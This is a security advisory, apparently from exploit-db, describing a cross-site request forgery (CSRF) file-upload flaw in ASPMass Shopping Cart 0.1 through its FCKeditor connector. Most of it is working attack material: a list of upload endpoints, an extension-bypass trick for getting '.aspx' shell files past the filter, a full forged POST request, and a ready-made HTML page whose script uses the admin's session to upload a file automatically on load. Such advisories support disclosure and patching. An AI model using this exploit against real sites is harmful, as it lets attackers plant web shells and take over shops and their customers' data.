'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
http://www.exploit-db.com/moaub-30-aspmass-shopping-cart-vulnerability-file-upload-csrf/
'''
 
Abysssec Inc Public Advisory
  
  
  Title            :  ASPMass Shopping Cart Vulnerability File Upload CSRF
  Affected Version :  ASPMass Shopping Cart 0.1
  Discovery        :  www.abysssec.com
  Vendor       :  http://www.aspmass.com/
  Demo         :  http://www.aspmass.com/demo.htm
  Admin Page       :  http://Example.com/Admin/Login.aspx
   
  
Description :
===========================================================================================     
  This version of ASP Shopping Cart has CSRF vulnerability for upload a file with fckEditor.
  But we have two limitation :
 
     1- We need Admin's Cookie 
     2- Specific file extension implementing by FckEditor v2 and bypassing this barrier is on you.
        For example the file with this extension shell.aspx;me.xml
        will be upload with this extension :     shell_aspx;me.xml
 
 
  you can upload your file with this paths: (of course with CSRF)
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1280125833981&Type=File&CurrentFolder=/
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/test.html
     http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html 
 
 
  Uploaded files will be placing in this path:
 
     .../Files/site/file/
     .../Files/site/flash/
     .../Files/site/image/
     .../Files/site/media/
         
    
  vulnerable Code:
     The misconfiguration is in ...\Images\js\fcKeditor\editor\filemanager\connectors\aspx\config.ascx 
     ln 40:
              private bool CheckAuthentication()
          {
            if (Session["AdminLogedIn"] == "Yes")
            {
                    return true;
            }
            else
            {
                    return false;
            }
          }
               
 
   For example you can feed this POST Request to Admin :
 
    ----------------------------------------------------------------------------------------
    POST http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/ HTTP/1.1
    Host: Example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Proxy-Connection: keep-alive 
    Referer: http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html
    Cookie: ASP.NET_SessionId=ejskxhea4eqnkirsbxebj145
    Content-Type: multipart/form-data; boundary=---------------------------92203111132182
    Content-Length: 198
 
 
    -----------------------------92203111132182
    Content-Disposition: form-data; name="NewFile"; filename="Test.xml"
    Content-Type: text/plain
 
    This is a shell...
    -----------------------------92203111132182--
     
    With this POST Request, the file Test.xml uploads i this path:
       .../Files/site/
 
 
The Source of HTML Page Malicious Link)
===========================================================================================    
  With this page, we send a request with AJAX to upload a file with Admin's Cookie.
   
 
<html>
<head>
<title >Wellcome to ASP Shopping Cart!</title>
Hello!
...
...
...
This page uploads a file with "xml" extension
 
<script>
     
    var binary;
    var filename;      
     
    function FileUpload() {                
        try {
            netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
        } catch (e) {
        }
 
        var http = false;       
        if (window.XMLHttpRequest) {                              
            http = new XMLHttpRequest();           
        }
        else if (window.ActiveXObject) {       
            http = new ActiveXObject("Microsoft.XMLHTTP");
        }
 
        var url = "http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/";
        var filename = 'Test.xml';
        var filetext = ' This is a shell ... ';
 
        var boundaryString = '---------------------------92203111132182';
        var boundary = '--' + boundaryString;
        var requestbody = boundary + '\n'
        + 'Content-Disposition: form-data; name="NewFile"; filename="'
        + filename + '"' + '\n'
            + 'Content-Type: text/plain' + '\n'
        + '\n'
        + filetext         
        + '\n'
        + boundary;
         
        http.onreadystatechange = done;
        http.open('POST', url, true);
         
        http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);       
        http.setRequestHeader("Connection", "close");
        http.setRequestHeader("Content-length", requestbody.length);
        http.send(requestbody);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200) {
                //alert(http.responseText);
                //alert('Upload OK');
            }           
        }            
</script>
</head>
<body onload ="FileUpload();">
</body>
</html>
 
===========================================================================================